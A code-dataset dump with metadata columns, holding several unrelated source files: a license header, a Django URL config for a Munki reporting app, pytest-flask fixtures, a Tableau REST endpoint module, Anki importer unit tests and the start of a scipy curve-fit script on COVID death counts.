| en | 0.778273 | # # @section License # # The MIT License (MIT) # # Copyright (c) 2016-2017, <NAME> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # This file is part of the Pumbaa project. # | 2.348122 | 2 |
reports/urls.py | aysiu/manana | 9 | 10388 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('reports.views',
url(r'^index/*$', 'index'),
url(r'^dashboard/*$', 'dashboard'),
url(r'^$', 'index'),
url(r'^detail/(?P<serial>[^/]+)$', 'detail'),
url(r'^detailpkg/(?P<serial>[^/]+)/(?P<manifest_name>[^/]+)$', 'detail_pkg'),
url(r'^detailmachine/(?P<serial>[^/]+)$', 'machine_detail'),
url(r'^appleupdate/(?P<serial>[^/]+)$', 'appleupdate'),
url(r'^raw/(?P<serial>[^/]+)$', 'raw'),
url(r'^submit/(?P<submission_type>[^/]+)$', 'submit'),
url(r'^warranty/(?P<serial>[^/]+)$', 'warranty'),
# for compatibilty with MunkiReport scripts
url(r'^ip$', 'lookup_ip'),
url(r'^(?P<submission_type>[^/]+)$', 'submit'),
) | from django.conf.urls import patterns, include, url
urlpatterns = patterns('reports.views',
url(r'^index/*$', 'index'),
url(r'^dashboard/*$', 'dashboard'),
url(r'^$', 'index'),
url(r'^detail/(?P<serial>[^/]+)$', 'detail'),
url(r'^detailpkg/(?P<serial>[^/]+)/(?P<manifest_name>[^/]+)$', 'detail_pkg'),
url(r'^detailmachine/(?P<serial>[^/]+)$', 'machine_detail'),
url(r'^appleupdate/(?P<serial>[^/]+)$', 'appleupdate'),
url(r'^raw/(?P<serial>[^/]+)$', 'raw'),
url(r'^submit/(?P<submission_type>[^/]+)$', 'submit'),
url(r'^warranty/(?P<serial>[^/]+)$', 'warranty'),
# for compatibilty with MunkiReport scripts
url(r'^ip$', 'lookup_ip'),
url(r'^(?P<submission_type>[^/]+)$', 'submit'),
) | en | 0.75041 | # for compatibilty with MunkiReport scripts | 2.00458 | 2 |
BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 0 | 10389 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import multiprocessing
import pytest
import socket
import signal
import os
import logging
try:
from urllib2 import URLError, urlopen
except ImportError:
from urllib.error import URLError
from urllib.request import urlopen
from flask import _request_ctx_stack
@pytest.yield_fixture
def client(app):
"""A Flask test client. An instance of :class:`flask.testing.TestClient`
by default.
"""
with app.test_client() as client:
yield client
@pytest.fixture
def client_class(request, client):
"""Uses to set a ``client`` class attribute to current Flask test client::
@pytest.mark.usefixtures('client_class')
class TestView:
def login(self, email, password):
credentials = {'email': email, 'password': password}
return self.client.post(url_for('login'), data=credentials)
def test_login(self):
assert self.login('<EMAIL>', 'pass').status_code == 200
"""
if request.cls is not None:
request.cls.client = client
class LiveServer(object):
"""The helper class uses to manage live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
:param host: The host where to listen (default localhost).
:param port: The port to run application.
"""
def __init__(self, app, host, port, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker,
args=(self.app, self.host, self.port)
)
self._process.start()
# We must wait for the server to start listening with a maximum
# timeout of 5 seconds.
timeout = 5
while timeout > 0:
time.sleep(1)
try:
urlopen(self.url())
timeout = 0
except URLError:
timeout -= 1
def url(self, url=''):
"""Returns the complete url based on server options."""
return 'http://%s:%d%s' % (self.host, self.port, url)
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error('Failed to join the live server process: %r', ex)
return False
def __repr__(self):
return '<LiveServer listening at %s>' % self.url()
def _rewrite_server_name(server_name, new_port):
"""Rewrite server port in ``server_name`` with ``new_port`` value."""
sep = ':'
if sep in server_name:
server_name, port = server_name.split(sep, 1)
return sep.join((server_name, new_port))
@pytest.fixture(scope='function')
def live_server(request, app, monkeypatch, pytestconfig):
"""Run application in a separate process.
When the ``live_server`` fixture is applied, the ``url_for`` function
works as expected::
def test_server_is_up_and_running(live_server):
index_url = url_for('index', _external=True)
assert index_url == 'http://localhost:5000/'
res = urllib2.urlopen(index_url)
assert res.code == 200
"""
port = pytestconfig.getvalue('live_server_port')
if port == 0:
# Bind to an open port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
host = pytestconfig.getvalue('live_server_host')
# Explicitly set application ``SERVER_NAME`` for test suite
# and restore original value on test teardown.
server_name = app.config['SERVER_NAME'] or 'localhost'
monkeypatch.setitem(app.config, 'SERVER_NAME',
_rewrite_server_name(server_name, str(port)))
clean_stop = request.config.getvalue('live_server_clean_stop')
server = LiveServer(app, host, port, clean_stop)
if request.config.getvalue('start_live_server'):
server.start()
request.addfinalizer(server.stop)
return server
@pytest.fixture
def config(app):
"""An application config."""
return app.config
@pytest.fixture
def request_ctx(app):
"""The request context which contains all request relevant information,
e.g. `session`, `g`, `flashes`, etc.
"""
return _request_ctx_stack.top
@pytest.fixture(params=['application/json', 'text/html'])
def mimetype(request):
return request.param
def _make_accept_header(mimetype):
return [('Accept', mimetype)]
@pytest.fixture
def accept_mimetype(mimetype):
return _make_accept_header(mimetype)
@pytest.fixture
def accept_json(request):
return _make_accept_header('application/json')
@pytest.fixture
def accept_jsonp():
return _make_accept_header('application/json-p')
@pytest.fixture(params=['*', '*/*'])
def accept_any(request):
return _make_accept_header(request.param)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import multiprocessing
import pytest
import socket
import signal
import os
import logging
try:
from urllib2 import URLError, urlopen
except ImportError:
from urllib.error import URLError
from urllib.request import urlopen
from flask import _request_ctx_stack
@pytest.yield_fixture
def client(app):
"""A Flask test client. An instance of :class:`flask.testing.TestClient`
by default.
"""
with app.test_client() as client:
yield client
@pytest.fixture
def client_class(request, client):
"""Uses to set a ``client`` class attribute to current Flask test client::
@pytest.mark.usefixtures('client_class')
class TestView:
def login(self, email, password):
credentials = {'email': email, 'password': password}
return self.client.post(url_for('login'), data=credentials)
def test_login(self):
assert self.login('<EMAIL>', 'pass').status_code == 200
"""
if request.cls is not None:
request.cls.client = client
class LiveServer(object):
"""The helper class uses to manage live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
:param host: The host where to listen (default localhost).
:param port: The port to run application.
"""
def __init__(self, app, host, port, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker,
args=(self.app, self.host, self.port)
)
self._process.start()
# We must wait for the server to start listening with a maximum
# timeout of 5 seconds.
timeout = 5
while timeout > 0:
time.sleep(1)
try:
urlopen(self.url())
timeout = 0
except URLError:
timeout -= 1
def url(self, url=''):
"""Returns the complete url based on server options."""
return 'http://%s:%d%s' % (self.host, self.port, url)
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error('Failed to join the live server process: %r', ex)
return False
def __repr__(self):
return '<LiveServer listening at %s>' % self.url()
def _rewrite_server_name(server_name, new_port):
"""Rewrite server port in ``server_name`` with ``new_port`` value."""
sep = ':'
if sep in server_name:
server_name, port = server_name.split(sep, 1)
return sep.join((server_name, new_port))
@pytest.fixture(scope='function')
def live_server(request, app, monkeypatch, pytestconfig):
"""Run application in a separate process.
When the ``live_server`` fixture is applied, the ``url_for`` function
works as expected::
def test_server_is_up_and_running(live_server):
index_url = url_for('index', _external=True)
assert index_url == 'http://localhost:5000/'
res = urllib2.urlopen(index_url)
assert res.code == 200
"""
port = pytestconfig.getvalue('live_server_port')
if port == 0:
# Bind to an open port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
host = pytestconfig.getvalue('live_server_host')
# Explicitly set application ``SERVER_NAME`` for test suite
# and restore original value on test teardown.
server_name = app.config['SERVER_NAME'] or 'localhost'
monkeypatch.setitem(app.config, 'SERVER_NAME',
_rewrite_server_name(server_name, str(port)))
clean_stop = request.config.getvalue('live_server_clean_stop')
server = LiveServer(app, host, port, clean_stop)
if request.config.getvalue('start_live_server'):
server.start()
request.addfinalizer(server.stop)
return server
@pytest.fixture
def config(app):
"""An application config."""
return app.config
@pytest.fixture
def request_ctx(app):
"""The request context which contains all request relevant information,
e.g. `session`, `g`, `flashes`, etc.
"""
return _request_ctx_stack.top
@pytest.fixture(params=['application/json', 'text/html'])
def mimetype(request):
return request.param
def _make_accept_header(mimetype):
return [('Accept', mimetype)]
@pytest.fixture
def accept_mimetype(mimetype):
return _make_accept_header(mimetype)
@pytest.fixture
def accept_json(request):
return _make_accept_header('application/json')
@pytest.fixture
def accept_jsonp():
return _make_accept_header('application/json-p')
@pytest.fixture(params=['*', '*/*'])
def accept_any(request):
return _make_accept_header(request.param)
| en | 0.691301 | #!/usr/bin/env python # -*- coding: utf-8 -*- A Flask test client. An instance of :class:`flask.testing.TestClient` by default. Uses to set a ``client`` class attribute to current Flask test client:: @pytest.mark.usefixtures('client_class') class TestView: def login(self, email, password): credentials = {'email': email, 'password': password} return self.client.post(url_for('login'), data=credentials) def test_login(self): assert self.login('<EMAIL>', 'pass').status_code == 200 The helper class uses to manage live server. Handles creation and stopping application in a separate process. :param app: The application to run. :param host: The host where to listen (default localhost). :param port: The port to run application. Start application in a separate process. # We must wait for the server to start listening with a maximum # timeout of 5 seconds. Returns the complete url based on server options. Stop application process. # If it's still alive, kill it Attempts to stop the server cleanly by sending a SIGINT signal and waiting for ``timeout`` seconds. :return: True if the server was cleanly stopped, False otherwise. Rewrite server port in ``server_name`` with ``new_port`` value. Run application in a separate process. When the ``live_server`` fixture is applied, the ``url_for`` function works as expected:: def test_server_is_up_and_running(live_server): index_url = url_for('index', _external=True) assert index_url == 'http://localhost:5000/' res = urllib2.urlopen(index_url) assert res.code == 200 # Bind to an open port # Explicitly set application ``SERVER_NAME`` for test suite # and restore original value on test teardown. An application config. The request context which contains all request relevant information, e.g. `session`, `g`, `flashes`, etc. | 2.307237 | 2 |
tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | 1 | 10390 | from .exceptions import (
ServerResponseError,
InternalServerError,
NonXMLResponseError,
EndpointUnavailableError,
)
from functools import wraps
from xml.etree.ElementTree import ParseError
from ..query import QuerySet
import logging
try:
from distutils2.version import NormalizedVersion as Version
except ImportError:
from distutils.version import LooseVersion as Version
logger = logging.getLogger("tableau.endpoint")
Success_codes = [200, 201, 202, 204]
class Endpoint(object):
def __init__(self, parent_srv):
self.parent_srv = parent_srv
@staticmethod
def _make_common_headers(auth_token, content_type):
headers = {}
if auth_token is not None:
headers["x-tableau-auth"] = auth_token
if content_type is not None:
headers["content-type"] = content_type
return headers
@staticmethod
def _safe_to_log(server_response):
"""Checks if the server_response content is not xml (eg binary image or zip)
and replaces it with a constant
"""
ALLOWED_CONTENT_TYPES = ("application/xml", "application/xml;charset=utf-8")
if server_response.headers.get("Content-Type", None) not in ALLOWED_CONTENT_TYPES:
return "[Truncated File Contents]"
else:
return server_response.content
def _make_request(
self,
method,
url,
content=None,
auth_token=None,
content_type=None,
parameters=None,
):
parameters = parameters or {}
parameters.update(self.parent_srv.http_options)
parameters["headers"] = Endpoint._make_common_headers(auth_token, content_type)
if content is not None:
parameters["data"] = content
logger.debug(u"request {}, url: {}".format(method.__name__, url))
if content:
logger.debug(u"request content: {}".format(content[:1000]))
server_response = method(url, **parameters)
self.parent_srv._namespace.detect(server_response.content)
self._check_status(server_response)
# This check is to determine if the response is a text response (xml or otherwise)
# so that we do not attempt to log bytes and other binary data.
if len(server_response.content) > 0 and server_response.encoding:
logger.debug(
u"Server response from {0}:\n\t{1}".format(
url, server_response.content.decode(server_response.encoding)
)
)
return server_response
def _check_status(self, server_response):
if server_response.status_code >= 500:
raise InternalServerError(server_response)
elif server_response.status_code not in Success_codes:
try:
raise ServerResponseError.from_response(server_response.content, self.parent_srv.namespace)
except ParseError:
# This will happen if we get a non-success HTTP code that
# doesn't return an xml error object (like metadata endpoints)
# we convert this to a better exception and pass through the raw
# response body
raise NonXMLResponseError(server_response.content)
except Exception:
# anything else re-raise here
raise
def get_unauthenticated_request(self, url):
return self._make_request(self.parent_srv.session.get, url)
def get_request(self, url, request_object=None, parameters=None):
if request_object is not None:
try:
# Query param delimiters don't need to be encoded for versions before 3.7 (2020.1)
self.parent_srv.assert_at_least_version("3.7")
parameters = parameters or {}
parameters["params"] = request_object.get_query_params()
except EndpointUnavailableError:
url = request_object.apply_query_params(url)
return self._make_request(
self.parent_srv.session.get,
url,
auth_token=self.parent_srv.auth_token,
parameters=parameters,
)
def delete_request(self, url):
# We don't return anything for a delete
self._make_request(self.parent_srv.session.delete, url, auth_token=self.parent_srv.auth_token)
def put_request(self, url, xml_request=None, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.put,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def post_request(self, url, xml_request, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.post,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def api(version):
"""Annotate the minimum supported version for an endpoint.
Checks the version on the server object and compares normalized versions.
It will raise an exception if the server version is > the version specified.
Args:
`version` minimum version that supports the endpoint. String.
Raises:
EndpointUnavailableError
Returns:
None
Example:
>>> @api(version="2.3")
>>> def get(self, req_options=None):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.parent_srv.assert_at_least_version(version)
return func(self, *args, **kwargs)
return wrapper
return _decorator
def parameter_added_in(**params):
"""Annotate minimum versions for new parameters or request options on an endpoint.
The api decorator documents when an endpoint was added, this decorator annotates
keyword arguments on endpoints that may control functionality added after an endpoint was introduced.
The REST API will ignore invalid parameters in most cases, so this raises a warning instead of throwing
an exception.
Args:
Key/value pairs of the form `parameter`=`version`. Kwargs.
Raises:
UserWarning
Returns:
None
Example:
>>> @api(version="2.0")
>>> @parameter_added_in(no_extract='2.5')
>>> def download(self, workbook_id, filepath=None, extract_only=False):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
import warnings
server_ver = Version(self.parent_srv.version or "0.0")
params_to_check = set(params) & set(kwargs)
for p in params_to_check:
min_ver = Version(str(params[p]))
if server_ver < min_ver:
error = "{!r} not available in {}, it will be ignored. Added in {}".format(p, server_ver, min_ver)
warnings.warn(error)
return func(self, *args, **kwargs)
return wrapper
return _decorator
class QuerysetEndpoint(Endpoint):
@api(version="2.0")
def all(self, *args, **kwargs):
queryset = QuerySet(self)
return queryset
@api(version="2.0")
def filter(self, *args, **kwargs):
queryset = QuerySet(self).filter(**kwargs)
return queryset
@api(version="2.0")
def order_by(self, *args, **kwargs):
queryset = QuerySet(self).order_by(*args)
return queryset
@api(version="2.0")
def paginate(self, **kwargs):
queryset = QuerySet(self).paginate(**kwargs)
return queryset
| from .exceptions import (
ServerResponseError,
InternalServerError,
NonXMLResponseError,
EndpointUnavailableError,
)
from functools import wraps
from xml.etree.ElementTree import ParseError
from ..query import QuerySet
import logging
try:
from distutils2.version import NormalizedVersion as Version
except ImportError:
from distutils.version import LooseVersion as Version
logger = logging.getLogger("tableau.endpoint")
Success_codes = [200, 201, 202, 204]
class Endpoint(object):
def __init__(self, parent_srv):
self.parent_srv = parent_srv
@staticmethod
def _make_common_headers(auth_token, content_type):
headers = {}
if auth_token is not None:
headers["x-tableau-auth"] = auth_token
if content_type is not None:
headers["content-type"] = content_type
return headers
@staticmethod
def _safe_to_log(server_response):
"""Checks if the server_response content is not xml (eg binary image or zip)
and replaces it with a constant
"""
ALLOWED_CONTENT_TYPES = ("application/xml", "application/xml;charset=utf-8")
if server_response.headers.get("Content-Type", None) not in ALLOWED_CONTENT_TYPES:
return "[Truncated File Contents]"
else:
return server_response.content
def _make_request(
self,
method,
url,
content=None,
auth_token=None,
content_type=None,
parameters=None,
):
parameters = parameters or {}
parameters.update(self.parent_srv.http_options)
parameters["headers"] = Endpoint._make_common_headers(auth_token, content_type)
if content is not None:
parameters["data"] = content
logger.debug(u"request {}, url: {}".format(method.__name__, url))
if content:
logger.debug(u"request content: {}".format(content[:1000]))
server_response = method(url, **parameters)
self.parent_srv._namespace.detect(server_response.content)
self._check_status(server_response)
# This check is to determine if the response is a text response (xml or otherwise)
# so that we do not attempt to log bytes and other binary data.
if len(server_response.content) > 0 and server_response.encoding:
logger.debug(
u"Server response from {0}:\n\t{1}".format(
url, server_response.content.decode(server_response.encoding)
)
)
return server_response
def _check_status(self, server_response):
if server_response.status_code >= 500:
raise InternalServerError(server_response)
elif server_response.status_code not in Success_codes:
try:
raise ServerResponseError.from_response(server_response.content, self.parent_srv.namespace)
except ParseError:
# This will happen if we get a non-success HTTP code that
# doesn't return an xml error object (like metadata endpoints)
# we convert this to a better exception and pass through the raw
# response body
raise NonXMLResponseError(server_response.content)
except Exception:
# anything else re-raise here
raise
def get_unauthenticated_request(self, url):
return self._make_request(self.parent_srv.session.get, url)
def get_request(self, url, request_object=None, parameters=None):
if request_object is not None:
try:
# Query param delimiters don't need to be encoded for versions before 3.7 (2020.1)
self.parent_srv.assert_at_least_version("3.7")
parameters = parameters or {}
parameters["params"] = request_object.get_query_params()
except EndpointUnavailableError:
url = request_object.apply_query_params(url)
return self._make_request(
self.parent_srv.session.get,
url,
auth_token=self.parent_srv.auth_token,
parameters=parameters,
)
def delete_request(self, url):
# We don't return anything for a delete
self._make_request(self.parent_srv.session.delete, url, auth_token=self.parent_srv.auth_token)
def put_request(self, url, xml_request=None, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.put,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def post_request(self, url, xml_request, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.post,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def api(version):
"""Annotate the minimum supported version for an endpoint.
Checks the version on the server object and compares normalized versions.
It will raise an exception if the server version is > the version specified.
Args:
`version` minimum version that supports the endpoint. String.
Raises:
EndpointUnavailableError
Returns:
None
Example:
>>> @api(version="2.3")
>>> def get(self, req_options=None):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.parent_srv.assert_at_least_version(version)
return func(self, *args, **kwargs)
return wrapper
return _decorator
def parameter_added_in(**params):
"""Annotate minimum versions for new parameters or request options on an endpoint.
The api decorator documents when an endpoint was added, this decorator annotates
keyword arguments on endpoints that may control functionality added after an endpoint was introduced.
The REST API will ignore invalid parameters in most cases, so this raises a warning instead of throwing
an exception.
Args:
Key/value pairs of the form `parameter`=`version`. Kwargs.
Raises:
UserWarning
Returns:
None
Example:
>>> @api(version="2.0")
>>> @parameter_added_in(no_extract='2.5')
>>> def download(self, workbook_id, filepath=None, extract_only=False):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
import warnings
server_ver = Version(self.parent_srv.version or "0.0")
params_to_check = set(params) & set(kwargs)
for p in params_to_check:
min_ver = Version(str(params[p]))
if server_ver < min_ver:
error = "{!r} not available in {}, it will be ignored. Added in {}".format(p, server_ver, min_ver)
warnings.warn(error)
return func(self, *args, **kwargs)
return wrapper
return _decorator
class QuerysetEndpoint(Endpoint):
@api(version="2.0")
def all(self, *args, **kwargs):
queryset = QuerySet(self)
return queryset
@api(version="2.0")
def filter(self, *args, **kwargs):
queryset = QuerySet(self).filter(**kwargs)
return queryset
@api(version="2.0")
def order_by(self, *args, **kwargs):
queryset = QuerySet(self).order_by(*args)
return queryset
@api(version="2.0")
def paginate(self, **kwargs):
queryset = QuerySet(self).paginate(**kwargs)
return queryset
| en | 0.759296 | Checks if the server_response content is not xml (eg binary image or zip) and replaces it with a constant # This check is to determine if the response is a text response (xml or otherwise) # so that we do not attempt to log bytes and other binary data. # This will happen if we get a non-success HTTP code that # doesn't return an xml error object (like metadata endpoints) # we convert this to a better exception and pass through the raw # response body # anything else re-raise here # Query param delimiters don't need to be encoded for versions before 3.7 (2020.1) # We don't return anything for a delete Annotate the minimum supported version for an endpoint. Checks the version on the server object and compares normalized versions. It will raise an exception if the server version is > the version specified. Args: `version` minimum version that supports the endpoint. String. Raises: EndpointUnavailableError Returns: None Example: >>> @api(version="2.3") >>> def get(self, req_options=None): >>> ... Annotate minimum versions for new parameters or request options on an endpoint. The api decorator documents when an endpoint was added, this decorator annotates keyword arguments on endpoints that may control functionality added after an endpoint was introduced. The REST API will ignore invalid parameters in most cases, so this raises a warning instead of throwing an exception. Args: Key/value pairs of the form `parameter`=`version`. Kwargs. Raises: UserWarning Returns: None Example: >>> @api(version="2.0") >>> @parameter_added_in(no_extract='2.5') >>> def download(self, workbook_id, filepath=None, extract_only=False): >>> ... | 2.39271 | 2 |
spec/test_importer.py | lajohnston/anki-freeplane | 15 | 10391 | import unittest
from freeplane_importer.importer import Importer
from mock import Mock
from mock import MagicMock
from mock import call
from freeplane_importer.model_not_found_exception import ModelNotFoundException
class TestImporter(unittest.TestCase):
def setUp(self):
self.mock_collection = Mock()
self.mock_model = MagicMock()
self.mock_collection.models.byName.return_value = self.mock_model
self.mock_note = MagicMock()
self.mock_note.model.return_value = self.mock_model
self.mock_collection.newNote.return_value = self.mock_note
self.mock_collection.models.fieldNames.return_value = []
self.importer = Importer(self.mock_collection)
self.mock_collection.db.scalar.return_value = None
self.note = {
'id': 100,
'deck': 'History',
'model': 'Basic',
'fields': {}
}
def test_it_should_initialise_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.setCurrent.assert_called_with(
self.mock_model)
def test_it_should_select_the_correct_deck(self):
self.mock_collection.decks.id.return_value = 100
self.importer = Importer(self.mock_collection)
self.importer.import_note(self.note)
self.mock_model.__setitem__.assert_called_with('did', 100)
self.mock_collection.decks.id.assert_called_with('History')
def test_it_should_find_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.byName.assert_called_with('Basic')
def test_it_should_return_true_if_note_was_added_successfully(self):
self.assertTrue(self.importer.import_note(self.note))
def test_it_should_raise_a_no_model_exception_if_the_model_does_not_exist(self):
self.mock_collection.models.byName.return_value = None
self.assertRaises(ModelNotFoundException,
self.importer.import_note, self.note)
def test_it_should_create_a_new_note(self):
self.importer.import_note(self.note)
self.mock_collection.newNote.assert_called_with()
def test_it_should_get_the_field_names_from_the_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.fieldNames.assert_called_with(
self.mock_model)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_lowercase(self):
self.mock_collection.models.fieldNames.return_value = ['id']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('id', 100)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_uppercase(self):
self.mock_collection.models.fieldNames.return_value = ['ID']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('ID', 100)
def test_it_should_populate_the_note_with_the_field_values(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front', 'Back']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_has_calls(
[call('Front', 'Front value'), call('Back', 'Back value')])
def test_it_should_ignore_fields_that_do_not_exist_in_the_model(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front']
self.importer.import_note(self.note)
self.assertFalse('Back' in self.mock_note)
def test_it_should_save_the_note_changes(self):
self.importer.import_note(self.note)
self.mock_note.flush.assert_called_with()
def test_it_should_attempt_to_find_an_existing_note_with_the_given_node_id(self):
self.mock_collection.getNote.return_value = self.mock_note
self.mock_collection.db.scalar.return_value = 123
self.importer.import_note(self.note)
self.mock_collection.getNote.assert_called_with(123)
def test_it_should_add_the_note_to_the_collection_if_it_is_new(self):
del self.mock_note.mod
self.importer.import_note(self.note)
self.mock_collection.addNote.assert_called_with(self.mock_note)
def test_it_should_not_add_the_note_to_the_collection_if_it_is_not_new(self):
self.importer.import_note(self.note)
self.assertEqual(0, self.mock_collection.addNote.call_count)
| import unittest
from freeplane_importer.importer import Importer
from mock import Mock
from mock import MagicMock
from mock import call
from freeplane_importer.model_not_found_exception import ModelNotFoundException
class TestImporter(unittest.TestCase):
def setUp(self):
self.mock_collection = Mock()
self.mock_model = MagicMock()
self.mock_collection.models.byName.return_value = self.mock_model
self.mock_note = MagicMock()
self.mock_note.model.return_value = self.mock_model
self.mock_collection.newNote.return_value = self.mock_note
self.mock_collection.models.fieldNames.return_value = []
self.importer = Importer(self.mock_collection)
self.mock_collection.db.scalar.return_value = None
self.note = {
'id': 100,
'deck': 'History',
'model': 'Basic',
'fields': {}
}
def test_it_should_initialise_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.setCurrent.assert_called_with(
self.mock_model)
def test_it_should_select_the_correct_deck(self):
self.mock_collection.decks.id.return_value = 100
self.importer = Importer(self.mock_collection)
self.importer.import_note(self.note)
self.mock_model.__setitem__.assert_called_with('did', 100)
self.mock_collection.decks.id.assert_called_with('History')
def test_it_should_find_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.byName.assert_called_with('Basic')
def test_it_should_return_true_if_note_was_added_successfully(self):
self.assertTrue(self.importer.import_note(self.note))
def test_it_should_raise_a_no_model_exception_if_the_model_does_not_exist(self):
self.mock_collection.models.byName.return_value = None
self.assertRaises(ModelNotFoundException,
self.importer.import_note, self.note)
def test_it_should_create_a_new_note(self):
self.importer.import_note(self.note)
self.mock_collection.newNote.assert_called_with()
def test_it_should_get_the_field_names_from_the_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.fieldNames.assert_called_with(
self.mock_model)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_lowercase(self):
self.mock_collection.models.fieldNames.return_value = ['id']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('id', 100)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_uppercase(self):
self.mock_collection.models.fieldNames.return_value = ['ID']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('ID', 100)
def test_it_should_populate_the_note_with_the_field_values(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front', 'Back']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_has_calls(
[call('Front', 'Front value'), call('Back', 'Back value')])
def test_it_should_ignore_fields_that_do_not_exist_in_the_model(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front']
self.importer.import_note(self.note)
self.assertFalse('Back' in self.mock_note)
def test_it_should_save_the_note_changes(self):
self.importer.import_note(self.note)
self.mock_note.flush.assert_called_with()
def test_it_should_attempt_to_find_an_existing_note_with_the_given_node_id(self):
self.mock_collection.getNote.return_value = self.mock_note
self.mock_collection.db.scalar.return_value = 123
self.importer.import_note(self.note)
self.mock_collection.getNote.assert_called_with(123)
def test_it_should_add_the_note_to_the_collection_if_it_is_new(self):
del self.mock_note.mod
self.importer.import_note(self.note)
self.mock_collection.addNote.assert_called_with(self.mock_note)
def test_it_should_not_add_the_note_to_the_collection_if_it_is_not_new(self):
self.importer.import_note(self.note)
self.assertEqual(0, self.mock_collection.addNote.call_count)
| none | 1 | 2.546978 | 3 |
|
analysis/fitexp.py | mfkasim91/idcovid19 | 0 | 10392 | import argparse
import numpy as np
from scipy.stats import linregress
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument("--plot", action="store_const", default=False, const=True)
args = parser.parse_args()
data = np.loadtxt("../data/data.csv", skiprows=1, usecols=list(range(1,8)), delimiter=",")[33:,:]
xdays = data[:,0] - np.mean(data[:,0])
deaths = data[:,-1]
print(xdays, deaths)
logdeaths = np.log(deaths)
slope, offset, rval, pval, stderr = linregress(xdays, logdeaths)
